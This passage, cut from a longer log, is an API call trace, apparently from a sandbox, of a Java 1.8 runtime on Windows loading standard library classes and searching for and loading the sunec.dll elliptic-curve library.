(_Size=0x32) returned 0x122989c0 [0108.820] strlen (_Str="java/util/HashMap$EntrySet.class") returned 0x20 [0108.820] malloc (_Size=0x48) returned 0x1228ed70 [0108.820] malloc (_Size=0xa0) returned 0x12324ac0 [0108.820] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419182, lpNewFilePointer=0x208c1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1e0*=54628738) returned 1 [0108.821] ReadFile (in: hFile=0x134, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c1b0, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208c1b0*=0xa0, lpOverlapped=0x0) returned 1 [0108.823] malloc (_Size=0x21) returned 0x122fa1d0 [0108.857] strlen (_Str="sun/nio/cs/Surrogate$Parser.class") returned 0x21 [0108.857] malloc (_Size=0x48) returned 0x1228ed70 [0108.857] malloc (_Size=0xa0) returned 0x12324280 [0108.857] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ee626, lpNewFilePointer=0x208bee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bee0*=54453798) returned 1 [0108.857] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208beb0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208beb0*=0xa0, lpOverlapped=0x0) returned 1 [0108.857] malloc (_Size=0x22) returned 0x122fa140 [0108.867] strlen (_Str="java/util/jar/JarVerifier$VerifierStream.class") returned 0x2e [0108.868] malloc (_Size=0x48) returned 0x1228ee60 [0108.868] malloc (_Size=0xa0) returned 0x12324a10 [0108.868] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3346f6f, lpNewFilePointer=0x208c510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c510*=53768047) returned 1 [0108.868] ReadFile (in: hFile=0x134, lpBuffer=0x12324a10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4e0, lpOverlapped=0x0 | out: lpBuffer=0x12324a10*, lpNumberOfBytesRead=0x208c4e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.869] malloc (_Size=0x2f) returned 0x12298680 [0108.870] malloc (_Size=0x48) returned 0x1228e230 [0108.871] malloc (_Size=0xa0) returned 0x12324330 [0108.871] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xa143, lpNewFilePointer=0x208ce90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce90*=41283) returned 1 [0108.871] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce60, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208ce60*=0xa0, lpOverlapped=0x0) returned 1 [0108.871] malloc (_Size=0x1c) returned 0x122fa140 [0108.874] strlen (_Str="sun/security/util/ManifestEntryVerifier$SunProviderHolder.class") returned 0x3f [0108.874] malloc (_Size=0x48) returned 0x1228e5a0 [0108.874] malloc (_Size=0xa0) returned 0x12324330 [0108.874] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e33da, lpNewFilePointer=0x208c0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0c0*=54408154) returned 1 [0108.875] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c090, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208c090*=0xa0, lpOverlapped=0x0) returned 1 [0108.875] malloc (_Size=0x40) returned 0x1228e6e0 [0108.876] strlen (_Str="sun/security/provider/Sun") returned 0x19 [0108.920] strlen (_Str="sun/security/provider/SHA") returned 0x19 [0108.922] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x4af6, lpNewFilePointer=0x208b160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b160*=19190) returned 1 [0108.922] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b1b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b130, lpOverlapped=0x0 | out: lpBuffer=0x208b1b0*, lpNumberOfBytesRead=0x208b130*=0x1e, lpOverlapped=0x0) returned 1 [0108.922] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x4b2f, lpNewFilePointer=0x208b1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1c0*=19247) returned 1 [0108.923] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b2d0, nNumberOfBytesToRead=0x2de, lpNumberOfBytesRead=0x208b190, lpOverlapped=0x0 | out: lpBuffer=0x208b2d0*, lpNumberOfBytesRead=0x208b190*=0x2de, lpOverlapped=0x0) returned 1 [0108.923] free (_Block=0x123230d0) [0108.923] free (_Block=0x1228e640) [0108.944] malloc (_Size=0x48f) returned 0x12ec25f0 [0108.947] strlen (_Str="java/security/Provider") returned 0x16 [0108.950] free (_Block=0x12ec25f0) [0108.952] strlen (_Str="java/util/Map") returned 0xd [0108.953] strlen (_Str="java/security/PrivilegedAction") returned 0x1e [0108.954] strlen (_Str="java/lang/Throwable") returned 0x13 [0108.956] strlen (_Str="java/lang/UnsatisfiedLinkError") returned 0x1e [0108.956] strlen (_Str="java/lang/UnsatisfiedLinkError.class") returned 0x24 [0108.957] malloc (_Size=0x48) returned 0x1228ed70 [0108.957] malloc (_Size=0xa0) returned 0x12324ee0 [0108.957] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3403eac, lpNewFilePointer=0x208be50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be50*=54541996) returned 1 [0108.957] ReadFile (in: hFile=0x134, lpBuffer=0x12324ee0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be20, lpOverlapped=0x0 | out: lpBuffer=0x12324ee0*, lpNumberOfBytesRead=0x208be20*=0xa0, lpOverlapped=0x0) returned 1 [0108.961] malloc (_Size=0x25) returned 0x12ec2670 [0108.970] strlen (_Str="sun/security/ec/SunEC$1") returned 0x17 [0108.971] strlen (_Str="sun/security/ec/SunEC$1.class") returned 0x1d [0108.971] strlen (_Str="sun/security/ec/SunEC$1.class") returned 0x1d [0108.971] strlen (_Str="sun/security/ec/SunEC$1.class") returned 0x1d [0108.973] malloc (_Size=0x48) returned 0x1228e5a0 [0108.973] malloc (_Size=0xa0) returned 0x12324960 [0108.973] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9ea3, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=40611) returned 1 [0108.973] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208b940*=0xa0, lpOverlapped=0x0) returned 1 [0108.973] malloc (_Size=0x1e) returned 0x12ec2d90 [0108.975] free (_Block=0x122fa140) [0108.975] free (_Block=0x1228e230) [0108.982] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x2469, lpNewFilePointer=0x2089b10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089b10*=9321) returned 1 [0108.982] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089b60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089ae0, lpOverlapped=0x0 | out: lpBuffer=0x2089b60*, lpNumberOfBytesRead=0x2089ae0*=0x1e, lpOverlapped=0x0) returned 1 [0108.982] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x24a4, lpNewFilePointer=0x2089b70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089b70*=9380) returned 1 [0108.984] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089c80, nNumberOfBytesToRead=0x181, lpNumberOfBytesRead=0x2089b40, lpOverlapped=0x0 | out: lpBuffer=0x2089c80*, lpNumberOfBytesRead=0x2089b40*=0x181, lpOverlapped=0x0) returned 1 [0108.996] malloc (_Size=0x28a) returned 0x12ec3200 [0108.999] strlen (_Str="java/lang/Object") returned 0x10 [0109.001] free (_Block=0x12ec3200) [0109.016] strlen (_Str="java/security/AccessController") returned 0x1e [0109.018] strlen (_Str="java/lang/System") returned 0x10 [0109.019] strlen (_Str="") returned 0x0 [0109.019] strlen (_Str=".dll") returned 0x4 [0109.021] strlen (_Str="java/net/URI.class") returned 0x12 [0109.021] malloc (_Size=0x48) returned 0x1228e230 [0109.021] malloc (_Size=0xa0) returned 0x12324b70 [0109.021] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3404239, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=54542905) returned 1 [0109.021] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208bf40*=0xa0, lpOverlapped=0x0) returned 1 [0109.021] malloc (_Size=0x13) returned 0x12323ab0 [0109.076] strlen (_Str="java/net/URI$Parser.class") returned 0x19 [0109.076] malloc (_Size=0x48) returned 0x1228ee10 [0109.076] malloc (_Size=0xa0) returned 0x12324750 [0109.076] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34041f2, lpNewFilePointer=0x208bf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf10*=54542834) returned 1 [0109.076] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bee0, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208bee0*=0xa0, lpOverlapped=0x0) returned 1 [0109.076] malloc (_Size=0x1a) returned 0x12ec2670 [0109.091] strlen (_Str="sun/nio/fs/DefaultFileSystemProvider.class") returned 0x2a [0109.091] malloc (_Size=0x48) returned 0x1228ed70 [0109.091] malloc (_Size=0xa0) returned 0x12324540 [0109.091] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cbeaa, lpNewFilePointer=0x208a5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a5b0*=54312618) returned 1 [0109.091] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a580, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208a580*=0xa0, lpOverlapped=0x0) returned 1 [0109.093] malloc (_Size=0x2b) returned 0x12298e40 [0109.107] strlen (_Str="sun/nio/fs/WindowsFileSystem.class") returned 0x22 [0109.107] malloc (_Size=0x48) returned 0x1228ed70 [0109.107] malloc (_Size=0xa0) returned 0x123246a0 [0109.107] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc9e7, lpNewFilePointer=0x208a7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a7a0*=54315495) returned 1 [0109.107] ReadFile (in: hFile=0x134, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a770, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208a770*=0xa0, lpOverlapped=0x0) returned 1 [0109.107] malloc (_Size=0x23) returned 0x12ec28b0 [0109.121] strlen (_Str="sun/nio/fs/Util.class") returned 0x15 [0109.121] malloc (_Size=0x48) returned 0x1228e960 [0109.122] malloc (_Size=0xa0) returned 0x12324ee0 [0109.122] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cc278, lpNewFilePointer=0x208a440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a440*=54313592) returned 1 [0109.122] ReadFile (in: hFile=0x134, lpBuffer=0x12324ee0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a410, lpOverlapped=0x0 | out: lpBuffer=0x12324ee0*, lpNumberOfBytesRead=0x208a410*=0xa0, lpOverlapped=0x0) returned 1 [0109.122] malloc (_Size=0x16) returned 0x12323e50 [0109.134] strlen (_Str="sun/nio/fs/WindowsUriSupport.class") returned 0x22 [0109.134] malloc (_Size=0x48) returned 0x1228eff0 [0109.134] malloc (_Size=0xa0) returned 0x123246a0 [0109.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cd293, lpNewFilePointer=0x208bc40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc40*=54317715) returned 1 [0109.134] ReadFile (in: hFile=0x134, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc10, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208bc10*=0xa0, lpOverlapped=0x0) returned 1 [0109.134] malloc (_Size=0x23) returned 0x12ec2b80 [0109.140] strlen (_Str="sun/nio/fs/WindowsPath.class") returned 0x1c [0109.140] malloc (_Size=0x48) returned 0x1228e960 [0109.140] malloc (_Size=0xa0) returned 0x12324a10 [0109.140] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cd006, lpNewFilePointer=0x208bbc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbc0*=54317062) returned 1 [0109.140] ReadFile (in: hFile=0x134, lpBuffer=0x12324a10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb90, lpOverlapped=0x0 | out: lpBuffer=0x12324a10*, lpNumberOfBytesRead=0x208bb90*=0xa0, lpOverlapped=0x0) returned 1 [0109.140] malloc (_Size=0x1d) returned 0x12ec2b20 [0109.149] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll") returned 0x3a [0109.149] malloc (_Size=0x80) returned 0x12ec42d0 [0109.149] wcscpy (in: _Dest=0x12ec42d0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll" [0109.150] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll", nBufferLength=0x9, lpBuffer=0x208cf28, lpFilePart=0x208cf20 | out: lpBuffer="", lpFilePart=0x208cf20*=0x0) returned 0x3b [0109.151] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\amd64\\sunec.dll"), fInfoLevelId=0x0, lpFileInformation=0x208ccc0 | out: lpFileInformation=0x208ccc0*(dwFileAttributes=0x8000008, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x6f6031c7, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x2000002, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2101000, nFileSizeHigh=0x0, nFileSizeLow=0xeb68)) returned 0 [0109.151] GetLastError () returned 0x3 [0109.152] free (_Block=0x12ec42d0) [0109.152] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.dll") returned 0x34 [0109.152] malloc (_Size=0x74) returned 0x12ec1150 [0109.152] wcscpy (in: _Dest=0x12ec1150, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.dll" [0109.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.dll", nBufferLength=0x9, lpBuffer=0x208cf28, lpFilePart=0x208cf20 | out: lpBuffer="", lpFilePart=0x208cf20*=0x0) returned 0x35 [0109.153] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunec.dll"), fInfoLevelId=0x0, lpFileInformation=0x208ccc0 | out: lpFileInformation=0x208ccc0*(dwFileAttributes=0x8000008, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x6f6031c7, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x20f0150, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x61c72958, nFileSizeHigh=0x7ffb, nFileSizeLow=0x20f0000)) returned 0 [0109.153] GetLastError () returned 0x2 [0109.153] free (_Block=0x12ec1150) [0109.176] strlen (_Str="") returned 0x0 [0109.176] strlen (_Str=".dll") returned 0x4 [0109.177] strlen (_Str="") returned 0x0 [0109.177] strlen (_Str=".dll") returned 0x4 [0109.177] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0109.177] malloc (_Size=0xa) returned 0x12323c30 [0109.177] strlen (_Str="sunec.dll") returned 0x9 [0109.177] malloc (_Size=0xa) returned 0x12323d70 [0109.177] strcpy (in: _Dest=0x12323d70, _Source="sunec.dll" | out: _Dest="sunec.dll") returned="sunec.dll" [0109.177] free (_Block=0x12323c30) [0109.178] strlen (_Str="sunec.dll") returned 0x9 [0109.178] strlen (_Str="sunec") returned 0x5 [0109.178] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0109.178] malloc (_Size=0x14) returned 0x12323a70 [0109.178] strncpy (in: _Dest=0x12323a70, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0109.178] strcat (in: _Dest=0x12323a70, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0109.178] strcat (in: _Dest=0x12323a70, _Source="sunec" | out: _Dest="_JNI_OnLoad_sunec") returned="_JNI_OnLoad_sunec" [0109.178] strcat (in: _Dest=0x12323a70, _Source="@8" | out: _Dest="_JNI_OnLoad_sunec@8") returned="_JNI_OnLoad_sunec@8" [0109.178] free (_Block=0x12323a70) [0109.178] strlen (_Str="sunec") returned 0x5 [0109.178] strlen (_Str="JNI_OnLoad") returned 0xa [0109.178] malloc (_Size=0x11) returned 0x12323c70 [0109.178] strcpy (in: _Dest=0x12323c70, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0109.178] strcat (in: _Dest=0x12323c70, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0109.178] strcat (in: _Dest=0x12323c70, _Source="sunec" | out: _Dest="JNI_OnLoad_sunec") returned="JNI_OnLoad_sunec" [0109.179] free (_Block=0x12323c70) [0109.179] free (_Block=0x12323d70) [0109.179] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll") returned 0x30 [0109.179] malloc (_Size=0x6c) returned 0x12ebff50 [0109.179] wcscpy (in: _Dest=0x12ebff50, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll" [0109.179] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll", nBufferLength=0x9, lpBuffer=0x208c2f8, lpFilePart=0x208c2f0 | out: lpBuffer="", lpFilePart=0x208c2f0*=0x0) returned 0x31 [0109.179] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\sunec.dll"), fInfoLevelId=0x0, lpFileInformation=0x208c090 | out: lpFileInformation=0x208c090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb363c49, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb363c49, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb364f9a, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x215c8)) returned 1 [0109.182] free (_Block=0x12ebff50) [0109.182] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0109.182] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll") returned 0x30 [0109.182] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll", lpFindFileData=0x208c360 | out: lpFindFileData=0x208c360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb363c49, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb363c49, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb364f9a, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x215c8, dwReserved0=0x0, dwReserved1=0x1d0000, cFileName="sunec.dll", cAlternateFileName="")) returned 0x425c00 [0109.183] FindClose (in: hFindFile=0x425c00 | out: hFindFile=0x425c00) returned 1 [0109.183] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0109.183] wcslen (_String="sunec.dll") returned 0x9 [0109.183] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll") returned 0x30 [0109.184] malloc (_Size=0x31) returned 0x12298ec0 [0109.270] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0109.270] malloc (_Size=0xf) returned 0x12323f70 [0109.270] strcpy (in: _Dest=0x12323f70, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0109.270] free (_Block=0x12323f70) [0109.270] strlen (_Str="JNI_OnLoad") returned 0xa [0109.270] malloc (_Size=0xc) returned 0x12323bb0 [0109.270] strcpy (in: _Dest=0x12323bb0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0109.270] free (_Block=0x12323bb0) [0109.270] free (_Block=0x12298ec0) [0109.272] strlen (_Str="sun/security/ec/SunECEntries") returned 0x1c [0109.272] strlen (_Str="sun/security/ec/SunECEntries.class") returned 0x22 [0109.273] strlen (_Str="sun/security/ec/SunECEntries.class") returned 0x22 [0109.273] strlen (_Str="sun/security/ec/SunECEntries.class") returned 0x22 [0109.274] malloc (_Size=0x48) returned 0x1228ee60 [0109.274] malloc (_Size=0xa0) returned 0x12324330 [0109.274] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xa18c, lpNewFilePointer=0x208b6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6f0*=41356) returned 1 [0109.274] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b6c0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b6c0*=0xa0, lpOverlapped=0x0) returned 1 [0109.274] malloc (_Size=0x23) returned 0x12ec27f0 [0109.275] free (_Block=0x12ec2d90) [0109.275] free (_Block=0x1228e5a0) [0109.277] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x4e1d, lpNewFilePointer=0x2089890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089890*=19997) returned 1 [0109.277] ReadFile (in: hFile=0x2cc, lpBuffer=0x20898e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089860, lpOverlapped=0x0 | out: lpBuffer=0x20898e0*, lpNumberOfBytesRead=0x2089860*=0x1e, lpOverlapped=0x0) returned 1 [0109.277] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x4e5d, lpNewFilePointer=0x20898f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20898f0*=20061) returned 1 [0109.277] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089a00, nNumberOfBytesToRead=0x772, lpNumberOfBytesRead=0x20898c0, lpOverlapped=0x0 | out: lpBuffer=0x2089a00*, lpNumberOfBytesRead=0x20898c0*=0x772, lpOverlapped=0x0) returned 1 [0109.290] malloc (_Size=0x125a) returned 0x12ec6080 [0109.294] free (_Block=0x12ec6080) [0109.295] strlen (_Str="java/lang/CharSequence") returned 0x16 [0109.299] strlen (_Str="java/lang/StringBuilder") returned 0x17 [0109.300] strlen (_Str="java/util/regex/Pattern") returned 0x17 [0109.303] strlen (_Str="sun/security/ec/CurveDB") returned 0x17 [0109.304] strlen (_Str="sun/security/ec/CurveDB.class") returned 0x1d [0109.304] strlen (_Str="sun/security/ec/CurveDB.class") returned 0x1d [0109.304] strlen (_Str="sun/security/ec/CurveDB.class") returned 0x1d [0109.305] malloc (_Size=0x48) returned 0x1228e6e0 [0109.305] malloc (_Size=0xa0) returned 0x12324330 [0109.305] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xa1dc, lpNewFilePointer=0x208b640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b640*=41436) returned 1 [0109.305] ReadFile (in: hFile=0x2cc, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b610, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b610*=0xa0, lpOverlapped=0x0) returned 1 [0109.305] malloc (_Size=0x1e) returned 0x12ec26d0 [0109.317] free (_Block=0x12ec27f0) [0109.317] free (_Block=0x1228ee60) [0109.322] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x55df, lpNewFilePointer=0x20897e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20897e0*=21983) returned 1 [0109.322] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089830, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20897b0, lpOverlapped=0x0 | out: lpBuffer=0x2089830*, lpNumberOfBytesRead=0x20897b0*=0x1e, lpOverlapped=0x0) returned 1 [0109.322] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x561a, lpNewFilePointer=0x2089840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089840*=22042) returned 1 [0109.322] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089950, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2089810, lpOverlapped=0x0 | out: lpBuffer=0x2089950*, lpNumberOfBytesRead=0x2089810*=0x2000, lpOverlapped=0x0) returned 1 [0109.402] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x761a, lpNewFilePointer=0x2089840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089840*=30234) returned 1 [0109.403] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089950, nNumberOfBytesToRead=0x17d1, lpNumberOfBytesRead=0x2089810, lpOverlapped=0x0 | out: lpBuffer=0x2089950*, lpNumberOfBytesRead=0x2089810*=0x17d1, lpOverlapped=0x0) returned 1 [0109.404] malloc (_Size=0x6dcb) returned 0x12ec7e20 [0109.413] free (_Block=0x12ec7e20) [0109.414] strlen (_Str="java/security/spec/ECField") returned 0x1a [0109.415] strlen (_Str="java/security/spec/ECField.class") returned 0x20 [0109.415] malloc (_Size=0x48) returned 0x12ed3110 [0109.415] malloc (_Size=0xa0) returned 0x12324960 [0109.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3334205, lpNewFilePointer=0x208b310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b310*=53690885) returned 1 [0109.415] ReadFile (in: hFile=0x134, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2e0, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208b2e0*=0xa0, lpOverlapped=0x0) returned 1 [0109.416] malloc (_Size=0x21) returned 0x12eceef0 [0109.417] strlen (_Str="java/lang/RuntimeException") returned 0x1a [0109.421] strlen (_Str="java/util/LinkedHashMap") returned 0x17 [0109.422] strlen (_Str="java/util/HashMap") returned 0x11 [0109.425] strlen (_Str="java/math/BigInteger") returned 0x14 [0109.429] strlen (_Str="java/security/spec/ECFieldFp") returned 0x1c [0109.429] strlen (_Str="java/security/spec/ECFieldFp.class") returned 0x22 [0109.429] malloc (_Size=0x48) returned 0x12ed3de0 [0109.429] malloc (_Size=0xa0) returned 0x12324ee0 [0109.429] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33342a4, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=53691044) returned 1 [0109.430] ReadFile (in: hFile=0x134, lpBuffer=0x12324ee0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324ee0*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0109.430] malloc (_Size=0x23) returned 0x12ecf6a0 [0109.435] strlen (_Str="java/security/spec/EllipticCurve") returned 0x20 [0109.435] strlen (_Str="java/security/spec/EllipticCurve.class") returned 0x26 [0109.435] malloc (_Size=0x48) returned 0x12ed3f20 [0109.436] malloc (_Size=0xa0) returned 0x12324cd0 [0109.436] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333449e, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=53691550) returned 1 [0109.436] ReadFile (in: hFile=0x134, 